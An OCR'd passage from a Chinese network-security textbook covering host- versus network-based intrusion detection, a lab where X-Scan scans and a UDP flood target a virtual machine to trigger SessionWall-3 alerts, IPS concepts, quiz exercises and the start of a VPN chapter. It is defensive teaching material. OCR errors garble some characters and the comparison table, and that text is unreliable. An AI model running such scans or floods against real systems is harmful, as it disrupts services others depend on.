基于 网 络 的 人 侵 检测 系统 也 有 弱点 :只 检查 直接 连接 网 段 的 通信 ,不 能 检测 在 不 同 网 段 
的 网 络 包 , 在 交换 以 太 网 环境 中 会 出 现 监测 范围 的 局 限 ;很 难 实现 一 些 复杂 的 需要 大 量 计算 
与 分 析 时 间 的 攻击 检测 ;处理 加 密 的 会 话 过 程 较 困难 。 


2. 基于 主机 的 入 侵 检 测 系 统 


基于 主机 的 入 侵 检 测 系 统 (HIDS) 通 常 是 安装 在 被 重点 检测 的 主机 之 上 ,主要 是 对 该 主 
机 的 网 络 实时 连接 以 及 系统 审计 日 志 进 行 智能 分 析 和 判断 。 如 果 其 中 主体 活动 十 分 可 疑 
(特征 或 违反 统计 规律 ), 入 侵 检 测 系统 就 会 采取 相应 措施 。 

基于 主机 的 IDS 使 用 验证 记录 ,自动 化 程度 大 大 提高 ,并 发 展 了 精密 的 可 迅速 做 出 响 
应 的 检测 技术 。 通 常 , 基 于 主机 的 IDS 可 监测 系统 .事件 和 Windows 下 的 安全 记录 以 及 
UNIX 环境 下 的 系统 记录 。 当 有 文件 发 生变 化 时 ,IDS 将 新 的 记录 条 目 与 攻击 标记 相 比 较 ， 
看 它们 是 否 匹 配 。 如 果 匹 配 ,系统 就 会 向 管理 员 报 警 并 向 别 的 目标 报告 ,以 采取 措施 。 

基于 主机 的 IDS 在 发 展 过 程 中 融入 了 其 他 技术 。 对 关键 系统 文件 和 可 执行 文件 的 入 
侵 检测 的 一 个 常用 方法 ,是 通过 定期 检查 校 验 和 来 进行 的 ,以 便 发 现 意 外 的 变化 。 反 应 的 快 
慢 与 轮 询 间隔 的 频率 有 直接 的 关系 。 许 多 IDS 产品 都 是 监听 端口 的 活动 ,并 在 特定 端口 被 
访问 时 向 管理 员 报 警 。 这 类 检测 方法 将 基于 网 络 的 入 侵 检 测 的 基本 方法 融入 基于 主机 的 检 
测 环境 中 。 

尽管 基于 主机 的 人 侵 检查 系统 不 如 基于 网 络 的 入 侵 检 测 系统 快捷 ,但 它 确实 具有 基于 
网 络 的 IDS 无 法 比拟 的 优点 。 这 些 优 点 包括 :更 好 的 辨识 分 析 、 对 特殊 主机 事件 的 紧密 关 
注 及 低廉 的 成 本 。 基 于 主机 的 入 侵 检测 系统 有 如 下 优点 。 

(1) 确定 攻击 是 否 成 功 。 由 于 基于 主机 的 IDS 使 用 含有 已 发 生 事件 信息 ,它们 可 以 比 
基于 网 络 的 IDS 更 加 准确 地 判断 攻击 是 否 成 功 。 在 这 方面 ,基于 主机 的 IDS 是 基于 网 络 的 
IDS 的 完美 补充 ,网 络 部 分 可 以 尽早 提供 警告 ,主机 部 分 可 以 确定 攻击 成 功 与 否 。 

(2) 监视 特定 的 系统 活动 。 基 于 主机 的 IDS 监视 用 户 和 访问 文件 的 活动 ,包括 文件 访 
问 改变 文件 权限 ,试图 建立 新 的 可 执行 文件 ,或 者 试图 访问 特殊 的 设备 。 例 如 ,基于 主机 的 
IDS 可 以 监视 所 有 用 户 的 登录 及 下 网 情况 .以 及 每 位 用 户 在 连接 到 网 络 以 后 的 行为 。 对 于 
基于 网 络 的 系统 要 做 到 这 个 程度 是 非常 困难 的 。 

基于 主机 的 IDS 还 可 监视 只 有 管理 员 才 能 实施 的 非 正常 行为 。 操 作 系 统 记 录 了 任何 
有 关 用 户 账号 的 增加 、 删 除 .更 改 的 情况 ,只 要 非 授权 改动 ,基于 主机 的 IDS 就 能 检测 到 这 
种 不 适当 的 改动 。 基 于 主机 的 IDS 还 可 审计 能 影响 系统 记录 的 校 验 措施 的 改变 。 

基于 主机 的 IDS 可 以 监视 主要 系统 文件 和 可 执行 文件 的 改变 。 系 统 能 够 查 出 那些 欲 
改写 重要 系统 文件 或 者 安装 特洛伊 木马 或 后 门 的 尝试 .并 将 它们 中 断 。 而 基于 网 络 的 IDS 
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有 时 会 查 不 到 这 些 行 为 。 

(3) 能 够 检查 到 基于 网 络 的 系统 检查 不 出 的 攻击 。 基 于 主机 的 系统 可 以 检测 到 那些 基 
于 网 络 的 系统 察觉 不 到 的 攻击 。 例 如 ,来 自主 要 服务 器 键盘 的 攻击 不 经 过 网 络 , 所 以 可 以 躲 
开 基于 网 络 的 人 侵 检测 系统 。 

(4) 适用 于 被 加 密 的 和 交换 的 环境 。 由 于 基于 主机 的 和 人 侵 检测 系统 安装 在 遍布 企业 的 
各 种 主机 上 ,它们 比 基 于 网 络 的 人 侵 检测 系统 更 加 适用 于 被 加 密 的 和 交换 的 环境 。 

交换 设备 可 将 大 型 网 络 分 成 许多 的 小 型 网 络 部 件 加 以 管理 ,所 以 从 覆盖 足够 大 的 网 络 
范围 的 角度 出 发 ,很 难 确定 配置 基于 网 络 的 IDS 的 最 佳 位 置 。 业 务 映 射 和 交换 机 上 的 管理 
端口 有 助 于 此 ,但 这 些 技术 有 时 并 不 适用 。 基 于 主机 的 入 侵 检 测 系统 可 安装 在 所 需 的 重要 
主机 上 ,在 交换 的 环境 中 具有 更 高 的 能 见 度 。 

某 些 加 密 方式 也 向 基于 网 络 的 人 侵 检 测 系统 发 出 了 挑战 。 由 于 加 密 方式 位 于 协议 堆栈 
内 ,所 以 基于 网 络 的 系统 可 能 对 某 些 攻击 没有 反应 ,基于 主机 的 IDS 没有 这 方面 的 限制 , 当 
操作 系统 及 基于 主机 的 系统 看 到 即将 到 来 的 业务 时 ,数据 流 已 经 被 解密 了 。 

(5) 近 于 实时 的 检测 和 响应 。 尽 管 基于 主机 的 人 侵 检测 系统 不 能 提供 真正 实时 的 反 
应 ,但 如 果 应 用 正确 ,反应 速度 可 以 非常 接近 实时 。 老 式 系统 利用 一 个 进程 在 预先 定义 的 间 
隔 内 检查 登记 文件 的 状态 和 内 容 , 与 老式 系统 不 同 ,当前 基于 主机 的 系统 的 中 断 指令 ,这 种 
新 的 记录 可 被 立即 处 理 , 显 著 减 少 了 从 攻击 验证 到 作出 响应 的 时 间 ,在 从 操作 系统 做 出 记录 
到 基于 主机 的 系统 得 到 辨识 结果 之 间 的 这 段 时 间 是 一 段 延迟 ,但 大 多 数 情况 下 ,在 破坏 发 生 
之 前 ,系统 就 能 发 现 人 侵 者 ,并 中 止 他 的 攻击 。 

(6) 不 要 求 额外 的 硬件 设备 。 基 于 主机 的 入 侵 检测 系统 存在 于 现行 网 络 结构 之 中 , 包 
括 文件 服务 器 、Web 服务 器 及 其 他 共享 资源 ,这 些 使 得 基于 主机 的 系统 效率 很 高 ,因为 它们 
不 需要 在 网 络 上 另外 安装 登记 ,维护 及 管理 硬件 设备 。 

(7) 记录 花费 更 加 低廉 。 基 于 网 络 的 入 侵 检测 系统 比 基 于 主机 的 入 侵 检 测 系统 要 昂贵 
的 多 。 

基于 主机 的 人 侵 检测 系统 也 有 弱点 :依赖 于 服务 器 固有 的 日 志 与 监视 能 力 ,而 主机 审计 
信息 易 受 攻击 ,入侵 者 可 设法 逃避 审计 :全面 部署 HIDS 代价 较 大 ;除了 监测 自身 的 主机 以 
外 ,不 监测 网 络 上 的 情况 ;HIDS 的 运行 或 多 或 少 会 影响 主机 的 性 能 ;只 对 主机 的 特定 用 户 、 
应 用 程序 执行 动作 和 日 志 进 行 检测 ,所 检测 到 的 攻击 类 型 有 限 。 

基于 主机 和 基于 网 络 的 人 侵 检测 系统 都 有 其 优势 和 劣势 ,两 种 方法 互 为 补充 。 一 种 真正 
有 效 的 入 侵 检测 系统 应 将 二 者 结合 。 基 于 主机 和 基于 网 络 的 入 侵 检 测 系统 的 比较 见 表 8-1。 

表 8-1 基于 主机 和 基于 网 络 的 入 侵 检 测 系 统 的 比较 

项 目 HIDS NIDS 
操作 系统 的 事件 日 志 、 应 用 程序 的 事件 日 志 、 
i 系统 调用 、 端 口 调用 和 安全 审计 记录 网 生 中 的 所有 涩 所 包 
能 够 提供 更 为 详尽 的 用 户 行为 信息 ;系统 复杂 | 不 会 影响 业务 系统 的 性 能 ;采取 旁 路 侦 听 


性 小 ; 误 报 率 低 工作 方式 ,不 会 影响 网 络 的 正常 运行 
对 主机 的 依赖 性 很 强 ; 对 主机 性 能 影响 较 大 ; . 
缺点 不 能 监测 网 络 状 况 不 能 检测 通过 加 密 通 道 的 攻击 
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84 项 目 实施 


任务 :SessionWall 入 侵 检 测 软件 的 使 用 


1. 任务 目标 


(1) 掌握 SessionWall-3 的 使 用 方法 。 
(2) 理解 人 侵 检测 系统 的 作用 。 


2. 任务 内 容 


(1) SessionWall-3 的 设置 与 操作 。 
(2) 自 定义 QQ 服务 。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) Windows Server 2000 虚拟 机 1 台 ( 主 机 A),Windows XP 计算 机 1 台 ( 主 机 B) 。 
(2) SessionWall-3 软件 1 套 。 

(3) X-Scan 扫描 软件 1 套 。 

(4) UDP Flood 攻击 软件 1 套 。 


4. 任务 实施 步骤 


(1) SessionWall-3 的 设置 与 操作 

在 Windows Server 2000 虚拟 机 (主机 A) 中 安装 SessionWall-3 软件 , 另 一 Windows 
XP 计算 机 (主机 B) 用 来 对 主机 A 实施 X-Scan 和 UDP Flood 攻击 。 

步骤 1: 在 Windows Server 2000 虚拟 机 (主机 A) 上 安装 并 启动 SessionWall-3 软件 ， 
启动 后 的 主 窗口 如 图 8-3 所 示 。 

步骤 2: 在 另 一 Windows XP 计算 机 (主机 B) 上 启动 X-Scan 扫描 软件 ,对 主机 A 进行 
各 种 安全 扫描 。 

步骤 3: 在 主机 A 上 可 看 到 报警 消息 按钮 仿 和 安全 冲突 按钮 愈 在 不 停 地 闪烁 ,并 发 出 报 
警 声 。 选 择 菜单 中 的 View 一 Alert Messages 命令 .打开 如 图 8-4 所 示 的 对 话 框 ,该 对 话 框 
中 列 出 了 各 种 报警 消息 。 

步骤 4: 查看 违反 安全 规则 的 行为 。SessionWall-3 中 内 置 了 许多 预定 义 的 违反 安全 规 
则 的 行为 , 当 检 测 到 这 些 行为 发 生 的 时 候 , 系 统 会 在 Detected security violations 对 话 框 中 
显示 这 些 行为 。 在 工具 栏 上 单 击 show security violations 按钮 登 , 打 开 如 图 8-5 所 示 的 对 话 
框 ,该 对 话 框 中 列 出 了 检测 到 的 违反 安全 规则 的 行为 。 

步骤 5: 在 主机 B 上 对 主机 A 的 80 端口 发 起 UDP Flood 攻击 .查看 主机 A 的 最 近 活 动情 
况 (Recent activity) ,如 图 8-6 所 示 ,可 见 主机 A 在 80 端口 收 到 了 大 量 的 UDP 攻击 数据 包 。 
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(2) 自 定 义 QQ 服务 

SessionWall-3 已 经 预定 义 了 许多 服务 ,用户 根据 需要 也 可 以 自 定义 服务 ,如 QQ 服务 。 

步骤 1: 选择 菜单 中 的 Settings-~Definitions 命令 ,打开 Definitions 窗口 ,在 “Services” 
选项 卡 中 显示 了 系统 预定 义 的 服务 ,如 图 8-7 所 示 。 

步骤 2: 单 击 Add 按钮 ,打开 Service Properties 对 话 框 ,设置 服务 名 称 为 QQ ,协议 为 
UDP ,端口 号 为 8000, 如 图 8-8 所 示 , 单 击 OK 按钮 ,返回 Definitions 窗口 ,再 单 击 “ 确 定 ” 
按钮 。 
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图 8-7 Definitions 窗口 图 8-8 ”Service Properties 对 话 框 


步骤 3: 定义 好 QQ 服务 后 , 当 网 络 中 存在 QQ 连接 时 , 就 会 被 系统 监测 到 ， 
如 图 8-9 所 示 。 


图 8-9 系统 监测 到 QQ 服务 
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85 拓展 提高 : 入侵 防 护 系 统 


随 着 网 络 入 侵 事 件 的 不 断 增加 和 黑客 攻击 水 平 的 不 断 提高 ,一 方面 网 络 遭 受 攻击 的 频 
度 日 益 加 快 ; 另 一 方面 网 络 受 到 攻击 作出 响应 的 时 间 却 越 来 越 滞 后 。 解 决 这 一 矛盾 ,传统 的 
防火 墙 或 人 侵 检测 技术 (IDS) 显 得 力不从心 ,这 就 需要 引入 一 种 全 新 的 技术 一 一 人 侵 防护 
系统 (Intrusion Prevention System,.IPS) 。 


1. IPS 的 原理 


防火 墙 是 实施 访问 控制 策略 的 系统 ,对 流 经 的 网 络 流量 进行 检查 ,拦截 不 符合 安全 策略 
的 数据 包 。 和 侵 检测 技术 (IDS) 通 过 监视 网 络 或 系统 资源 ,寻找 违反 安全 策略 的 行为 或 攻 
击 迹象 ,并 发 出 报警 。 传 统 的 防火 墙 旨 在 拒绝 那些 明显 可 疑 的 网 络 流量 ,但 仍然 允许 某 些 流 
量 通 过 ,因此 防火 墙 对 于 很 多 入 侵 攻击 仍然 无 计 可 施 。 绝 大 多 数 IDS 系统 都 是 被 动 的 ,而 
不 是 主动 的 。 也 就 是 说 .在 攻击 实际 发 生 之 前 ,它们 往往 无 法 预先 发 出 警报 。 而 入 侵 防 护 系 
统 (IPS) 则 倾向 于 提供 主动 防护 ,其 设计 宗旨 是 预先 对 入 侵 活动 和 攻击 性 网 络 流量 进行 拦 
截 ,避免 其 造成 损失 ,而 不 是 简单 地 在 恶意 流量 传送 时 或 传送 后 才 发 出 警报 。IPS 是 通过 直 
接 能 入 到 网 络 流量 中 实现 这 一 功能 的 , 即 通过 一 个 网 络 端口 接收 来 自 外 部 系统 的 流量 ,经 过 
检查 确认 其 中 不 包含 异常 活动 或 可 疑 内 容 后 ,再 通过 另外 一 个 端口 将 它 传送 到 内 部 系统 中 。 
这 样 一 来 ,有 问题 的 数据 包 , 以 及 所 有 来 自 同一 数据 流 的 后 续 数 据 包 ,都 能 在 IPS 设备 中 被 
清除 掉 。 


2. IPS 的 分 类 


(1) 基于 主机 的 入 侵 防护 系统 (HIPS)。 在 技术 上 ,HIPS 采 用 独特 的 服务 器 保护 途径 ， 
由 包 过 滤 、 状 态 包 检 测 和 实时 入 侵 检 测 组 成 分 层 防护 体系 。 这 种 体系 能 够 在 提供 合理 吞吐 
率 的 前 提 下 ,最 大 限度 地 保护 服务 器 的 敏感 内 容 . 既 可 以 以 软件 形式 嵌入 到 应 用 程序 对 操作 
系统 的 调用 当中 ,拦截 针对 操作 系统 的 可 疑 调用 ,提供 对 主机 的 安全 防护 ,也 可 以 以 更 改 操 
作 系 统 内 核 程序 的 方式 ,提供 比 操作 系统 更 加 严谨 的 安全 控制 机 制 。 

由 于 HIPS 工作 在 受 保护 的 主机 /服务 器 上 . 它 不 但 能 够 利用 特征 和 行为 规则 检测 , 阻 
止 诸如 缓冲 区 溢出 之 类 的 已 知 攻击 ,还 能 够 防范 未 知 攻 击 ,防止 针对 Web 页 面 、 应 用 和 资源 
的 未 授权 的 任何 非法 访问 。HIPS 与 具体 的 主机 /服务 器 操作 系统 平台 紧密 相关 ,不 同 的 平 
台 需 要 不 同 的 软件 代理 程序 。 

(2) 基于 网 络 的 人 侵 防护 (NIPS)。NIPS 通过 检测 流 经 的 网 络 流量 ,提供 对 网 络 系统 
的 安全 保护 。 由 于 它 采 用 在 线 连接 方式 .所 以 一 旦 辨识 出 入 侵 行 为 .NIPS 就 可 以 去 除 整个 
网 络 会 话 ,而 不 仅仅 是 复位 会 话 。 同 样 由 于 实时 在 线 ,NIPS 需要 具备 很 高 的 性 能 ,以 免 成 
为 网 络 的 瓶颈 ,因此 NIPS 通常 被 设计 成 类 似 于 交换 机 的 网 络 设备 ,提供 线 速 吞吐 速率 以 及 
多 个 网 络 端口 。 
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3. IDS 和 IPS 的 关系 


绝 大 多 数 IDS 系统 都 是 被 动 的 ,而 不 是 主动 的 。 在 攻击 实际 发 生 之 前 ,IDS 往往 无 法 
预先 发 出 警报 。IPS 则 倾向 于 提供 主动 防护 ,其 设计 宗旨 是 预先 对 入 侵 活动 和 攻击 性 网 络 
流量 进行 拦截 ,避免 其 造成 任何 损失 ,而 不 是 简单 地 在 恶意 流量 传送 时 或 传送 后 才 发 出 警 
报 。 这 也 是 IPS 市 场 启动 的 根源 。 

在 主动 防御 渐 人 人 心 之 时 ,担当 网 络 警卫 的 IDS 的 报警 作用 就 显得 更 加 重要 。 尽 管 
IDS 功 过 参半 ,但 是 IDS 的 报警 功能 仍 是 主动 防御 系统 所 必需 的 :也 许 IDS 的 产品 形式 会 消 
失 ,但 是 IDS 的 检测 功能 并 不 会 因 形式 的 消失 而 消失 ,只 是 逐渐 被 转化 和 吸纳 到 其 他 的 安 
全 设备 当中 。 

IDS 与 IPS 技术 还 会 并 驾 齐 驱 很 长 一 段 时 间 。 据 市 场 研究 公司 Infonetics Research 发 
布 的 数据 显示 ,到 2006 年 ,全 球 IDS 与 IPS 市 场 收入 已 超过 13 亿美 元 。 

其 实 IDS 的 发 展 道路 可 以 借鉴 防火 墙 的 发 展 。 防 火 墙 早期 从 包 过 滤 .应 用 代理 发 展 起 
来 ,是 从 网 络 层 应 用 及 应 用 层 解 释 开 始 , 一 步 步 关心 起 具体 的 协议 。 包 过 滤 关 注 分 组 的 包 
头 , 应 用 代理 关心 分 组 的 有 效 载荷 ,状态 检测 开始 关注 分 组 之 间 的 关系 。 从 安全 设备 发 展 的 
角度 ,这 些 并 未 发 展 到 头 , 因 为 对 有 效 载荷 的 分 析 还 比较 弱 。IDS 从 特征 匹配 开始 到 协议 分 
析 , 走 的 也 是 这 条 路 ,只 是 IDS 走 到 协议 分 析 , 也 算是 比较 深入 了 ,但 网 络 上 的 应 用 太 复 杂 
了 ,技术 挑战 性 太 大 ,依照 当前 的 用 法 与 定位 ,IDS 长 期 很 难 生 存 。 但 它 对 分 组 有 效 载 荷 的 
分 析 有 自己 的 优势 ,这 种 技术 可 以 用 于 所 有 的 网 络 安全 设备 。IPS 其 实 解决 的 也 是 边界 安 
全 问题 , 它 已 开始 像 是 防火 墙 的 升级 版 了 。 

由 此 来 看 ,IDS 和 IPS 将 会 有 着 不 同 的 发 展 方向 和 职责 定位 。IDS 短期 内 不 会 消亡 ， 
IPS 也 不 会 完全 取代 IDS 的 作用 。 虽 然 IPS 市 场 前 景 被 绝 大 多 数 人 看 好 ,市 场 成 熟 指 日 可 
待 ,但 要 想 靠 蚕食 IDS 市 场 来 扩大 市 场 份额 ,对 于 IPS 还 是 很 艰难 的 。 


86 习 题 
一 、 选 择 题 
1. 人 侵 检 测 系统 是 对 的 合理 补充 ,帮助 网 络 抵御 网 络 攻击 。 
A. 交换 机 B. 路 由 器 C. 服务 器 D. 防火 墙 
2. 根据 数据 分 析 方 法 的 不 同 , 入 侵 检测 系统 可 以 分 为 两 类 。 
A. 基于 主机 和 基于 网 络 B. 基于 异常 和 基于 误 用 
C. 集中 式 和 分 布 式 D. 离线 检测 和 在 线 检测 
3， 入侵 检测 系统 按 数据 来 源 可 以 分 为 基于 和 基于 两 种 。 
A. 主机 ”网络 B. 主机 服务 器 
C. 网 络 服务 器 D. 服务 器 ”客户 机 
4. 下 面 不 属于 误 用 检测 技术 的 特点 。 
A. 发 现 一 些 未 知 的 人 侵 行 为 B. 误 报 率 低 ,准确 率 高 
C. 对 系统 依赖 性 较 强 D. 对 一 些 具体 的 行为 进行 判断 和 推理 
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5. 下 列 不 是 基于 主机 的 IDS 的 特点 。 
A. 占用 主机 资源 
B. 对 网 络 流量 不 敏感 
C. 依赖 于 主机 的 固有 的 日 志和 监控 能 力 
D. 实时 检测 和 响应 
6. 以 下 关于 入 侵 检 测 系统 说 法 中 ,正确 的 是 
A. 人 侵 检测 系统 就 是 防火 墙 系统 
B. 和 人 侵 检 测 系统 可 以 取代 防火 墙 
C. 入 侵 检测 系统 可 以 审计 系统 配置 和 漏洞 
D. 入 侵 检 测 系统 不 具有 断 开 网 络 的 功能 
7. 为 了 防止 人 侵 , 可 采用 的 技术 是 


A. 人 侵 检测 技术 B. 查 杀 病毒 技术 
C. 防火 墙 技术 D. VPN 技术 
8. 方法 主要 来 源 于 这 样 的 思想 :任何 人 的 正常 行为 都 是 有 一 定 的 规律 的 ,并 


且 可 以 通过 分 析 这 些 行为 产生 的 日 志 信息 (假定 日 志 信息 足够 安全 ) 总 结 出 这 些 规 
律 , 而 入 侵 和 混用 行为 则 通常 和 正常 的 行为 存在 严重 的 差异 ,通过 检查 这 些 差异 就 
可 以 检测 出 这 些 入 侵 。 
A. 基于 异常 的 入侵 检测 B. 基于 误 用 的 和 人 侵 检测 
C. 基于 自治 代理 技术 D. 自 适应 模型 生成 特性 的 入 侵 检测 系统 
二 、 填空 题 
1. CIDF 提出 了 一 个 通用 模型 ,将 入侵 检测 系统 分 为 4 个 基本 组 件 : 
和 。 
么 的 含义 是 :通过 某 种 方式 预先 定义 人 侵 行为 ,然后 监视 系统 的 运行 ,并 找 出 
符合 预先 定义 规则 的 入 侵 行为 。 
3. 面 对 当今 用 户 呼 吁 采取 主动 防御 ,早先 的 IDS 体现 了 自身 的 缺陷 ,于 是 出 现 了 
,提供 了 主动 性 的 防护 。 
4. 实际 无 害 的 事件 却 被 IDS 检测 为 攻击 事件 称 为 
三 、 简 答题 
1. 什么 是 IDS? 它 有 何 基本 功能 ? 
2. 简 述 公共 入 侵 检 测 框架 (CIDF) 模 型 。 
3. 基于 主机 的 入 侵 检 测 和 基于 网 络 的 人 侵 检 测 有 何 区 别 ? 
4 
5 


. 基于 异常 的 入 侵 检测 和 基于 误 用 的 入 侵 检 测 有 何 区 别 ? 
. 未 来 IDS 会 退出 历史 舞台 吗 ? IPS 会 取代 IDS 吗 ? 
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91 项 目 提 出 


随 着 公司 规模 的 快速 扩张 , 张 先生 在 全 国 各 地 开办 了 上 百 家 分 公司 。 由 于 总 公司 的 财 
务 系统 .OA 、ERP、CRM 等 软件 系统 需要 将 各 地 分 公司 的 数据 实时 汇总 、 集 中 管理 ,统一 存 
储 和 统一 安全 防护 ,所 以 总 公司 与 各 地 分 公司 需要 联网 。 

虽然 可 以 租用 电信 运营 商 的 专线 进行 联网 ,但 专线 费用 晶 贵 ,况且 同一 运营 商 的 网 络 团 
盖 范 围 有 限 ,不 能 提供 跨 运 营 商 的 专线 租赁 服务 ,导致 只 能 租用 一 家 运营 商 的 专线 (如 中 国 
电信 )。 而 * 南 电信 , 北 网 通 ” 导 致 北方 有 的 分 公司 不 在 中 国电 信 的 网 络 覆 盖 范 围 之 内 。 

如 果 直 接 使 用 互联 网 进行 网 络 简单 互联 , 则 会 带 来 很 多 安全 性 问题 ,如 ERP 服务 器 被 
互联 网 上 的 黑客 发 现 和 攻击 ,口令 被 破解 ,传输 的 数据 被 截获 …… 

另外 , 张 先生 经 常 要 到 外 地 出 差 ,出 差 期 间 可 能 需要 访问 公司 局 域 网 内 部 的 资料 ,访问 
过 程 中 的 数据 传输 安全 也 是 不 可 避免 的 问题 。 为 此 , 张 先生 需要 找到 一 个 切实 可 行 的 解决 
方案 。 


92 项 目 分 析 


在 经 济 全 球 化 的 今天 . 越 来 越 多 的 公司 ,企业 开始 在 各 地 建立 分 支 机 构 , 开 展业 务 ,移动 
办 公 人 员 也 随 之 剧 增 。 在 这 样 的 背景 下 ,这 些 在 家 办 公 或 下 班 后 继续 工作 的 人 员 和 移动 办 
公 人 员 ,远程 办 公 室 ,公司 各 分 支 机 构 ,公司 与 合作 伙伴 、 供 应 商 , 公 司 与 客户 之 间 都 可 能 需 
要 建立 连接 通道 以 进行 信息 传送 。 

传统 的 企业 组 网 方案 中 .要 进行 远 地 LAN 到 本 地 LAN 互联 ,除了 租用 DDN 专线 或 帧 
中 继 之 外 ,没有 更 好 的 解决 方法 。 对 于 移动 用 户 与 远 端 用 户 而 言 ,只 能 通过 拨号 线路 进入 企 
业 各 自 独立 的 局 域 网 ,这 样 的 方案 必然 导致 高 郧 的 长 途 线路 租用 费 及 长 途 电话 费 。 于 是 , 虚 
拟 专 用 网 的 概念 与 市 场 随 之 出 现 。 

虚拟 专用 网 是 企业 网 在 互联 网 等 公共 网 络 上 的 延伸 .通过 一 个 私有 的 通道 在 公共 网 络 
上 创建 一 个 安全 的 私有 连接 。 虚 拟 专用 网 通过 安全 的 数据 通道 将 远程 用 户 、 公 司 分 支 机 构 、 
公司 业务 伙伴 等 跟 公 司 的 企业 网 连接 起 来 ,构成 一 个 扩展 的 公司 企业 网 。 在 该 网 中 的 主机 
将 不 会 觉察 到 公共 网 络 的 存在 ,仿佛 所 有 的 主机 都 处 于 同一 个 网 络 之 中 ,就 像 公共 网 络 只 由 
本 网 络 在 独占 使 用 一 样 :而 事实 上 并 非 如 此 ,所 以 称 为 虚拟 专用 网 。 虚 拟 专 用 网 具有 成 本 低 
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廉 .可 扩展 性 好 、 自 主 控制 的 主动 权 、 全 方位 的 安全 保护 ,性价比 高 .使 用 和 管理 方便 、 原 有 投 
资 得 到 保护 等 优点 。 

为 此 , 张 先生 决定 采用 虚拟 专用 网 技术 实现 总 公司 与 各 地 分 公司 的 安全 联网 ,并 使 出 差 
员工 能 安全 访问 公司 局 域 网 。 


93 相关 知识 点 


9.3. 1 VPN 概述 


虚拟 专用 网 (Virtual Private Network,VPN) 是 指 通过 一 个 公用 网 络 ( 通 常 是 互联 网 ) 
建立 的 一 个 临时 的 安全 连接 ,是 一 条 穿 过 公用 网 络 的 安全 ,稳定 的 隧道 。VPN 是 企业 网 在 
互联 网 等 公共 网 络 上 的 延伸 , 它 通 过 安全 的 数据 通道 ,帮助 远程 用 户 、 公 司 分 支 机构 .商业 伙 
伴 及 供应 商 与 公司 的 内 部 网 建立 可 信 的 安全 连接 ,并 保证 数据 的 安全 传输 ,构成 一 个 扩展 的 
公司 企业 网 ,如 图 9-1 所 示 。VPN 可 用 于 不 断 增长 的 移动 用 户 的 全 球 互联 网 接 入 ,以 实现 
安全 连接 ,可 用 于 实现 企业 网 络 之 间 安 全 通信 的 虚拟 专用 线路 。 


VPN 虚 拟 专用 网 络 


$_ ge 
» 


逻辑 等 同 网 络 


图 9-1 虚拟 专用 网 


通俗 地 讲 ,VPN 实际 上 是 “线路 中 的 线路 ”, 类 似 于 城市 道路 上 的 “公交 专用 线 ”, 所 不 同 
的 是 ,由 VPN 组 成 的 “线路 ”并 不 是 物理 存在 的 .而 是 通过 技术 手段 模拟 出 来 的 , 即 是 “ 虚 
拟 ” 的 。 不 过 ,这 种 虚拟 的 专用 网 络 技术 却 可 以 在 一 条 公用 线路 中 为 两 台 计 算 机 建立 一 个 多 
辑 上 的 专用 “通道 ”, 它 具有 良好 的 保密 性 和 抗 干扰 性 ,使 双方 能 进行 自由 而 安全 的 点 对 点 连 
接 , 因 此 得 到 网 络 管理 员 的 广泛 关注 。 

互联 网 工程 任务 小 组 (Internet Engineering Task Force,IETF) 已 经 开始 为 VPN 技术 
制订 标准 ,基于 这 一 标准 的 产品 ,将 使 各 种 应 用 场合 下 的 VPN 具有 充分 的 互 操 作 性 和 可 扩 
展 性 。 
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VPN 可 以 实现 不 同 网 络 组 件 和 资源 之 间 的 相互 连接 ,利用 互联 网 或 其 他 公共 互联 网 络 
的 基础 设施 为 用 户 创建 隧道 ,并 提供 与 专用 网 络 一 样 的 安全 和 功能 保障 。 提 高 VPN 效用 
的 关键 问题 在 于 当 用 户 的 业务 需求 发 生变 化 时 ,用 户 能 很 方便 地 调整 他 的 VPN 以 适应 变 
化 ,并 且 能 方便 地 升级 到 将 来 新 的 TCP/IP 版 本 ;而 那些 提供 门类 齐全 的 软 、 硬 件 VPN 产品 
的 供应 商 , 则 能 提供 一 些 灵活 的 选择 以 满足 用 户 的 要 求 。 日 前 的 VPN 产品 主要 运行 在 
IPv4 之 上 ,但 应 当 具 备 升级 到 IPv6 的 能 力 , 同 时 要 保持 良好 的 互 操作 性 。 


9.3.2 VPN 的 特点 


VPN 是 平衡 Internet 的 实用 性 和 价格 优势 的 最 有 前 途 的 通信 手段 之 一 。 利 用 共享 的 
IP 网 络 建立 VPN 连接 ,可 以 使 企业 减少 对 昂贵 的 租用 专线 和 复杂 的 远程 访问 方案 的 依赖 
性 。 它 具有 以 下 特点 。 

(1) 安全 性 。 用 加 密 技 术 对 经 过 隧道 传输 的 数据 进行 加 密 , 以 保证 数据 仅 被 指定 的 发 
送 者 和 接收 者 了 解 , 从 而 保证 了 数据 的 私有 性 和 安全 性 。 

(2) 专用 性 。 在 非 面向 连接 的 公用 IP 网 络 上 建立 一 个 逻辑 的 ,点 对 点 的 连接 , 称 为 建 
立 一 个 隧道 。 

(3) 经 济 性 。 它 可 以 使 移动 用 户 和 一 些小 型 的 分 支 机 构 的 网 络 开 销 减少 ,不 仅 可 以 大 
幅度 削减 传输 数据 的 开销 ,同时 可 以 削减 传输 话音 的 开销 。 

(4) 扩展 性 和 灵活 性 。 能 够 支持 通过 Intranet 和 Extranet 的 任何 类 型 的 数据 流 ,方便 
增加 新 的 节点 ,支持 多 种 类 型 的 传输 媒介 ,可 以 满足 同时 传输 语音 、 图 像 和 数据 等 新 应 用 对 
高 质量 传输 以 及 带宽 增加 的 需求 。 


9.3.3 VPN 的 处 理 过 程 
一 条 VPN 连接 一 般 由 客户 机 、 隧 道 和 服务 器 3 个 部 分 组 成 。VPN 系统 使 分 布 在 不 同 


地 方 的 专用 网 络 在 不 可 信任 的 公共 网 络 上 安全 的 通信 。 它 采用 复杂 的 算法 来 加 密 传输 的 信 
息 ,使 得 敏感 的 数据 不 会 被 窃听 。 其 处 理 过 程 大 体 如 下 .如 图 9-2 所 示 。 


站 


VPN 设 备 (接收 方 ) 


图 9-2 VPN 的 处 理 过 程 
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(1) 要 保护 的 主机 发 送 明 文 信息 到 连接 公共 网 络 的 VPN 设备 。 

(2) VPN 设备 根据 网 管 设置 的 规则 ,确定 是 否 需 要 对 数据 进行 加 密 或 让 数据 直接 

(3) 对 需要 加 密 的 数据 ,VPN 设备 对 整个 数据 包 进 行 加 密 和 附 上 数字 签名 。 

(4) VPN 设备 加 上 新 的 数据 报头 ,其 中 包括 目的 地 VPN 设备 需要 的 安全 信息 和 一 些 
初始 化 参数 。 

(5) VPN 设备 对 加 密 后 的 数据 ,鉴别 包 以 及 源 IP 地 址 .目标 VPN 设备 IP 地 址 进行 重 
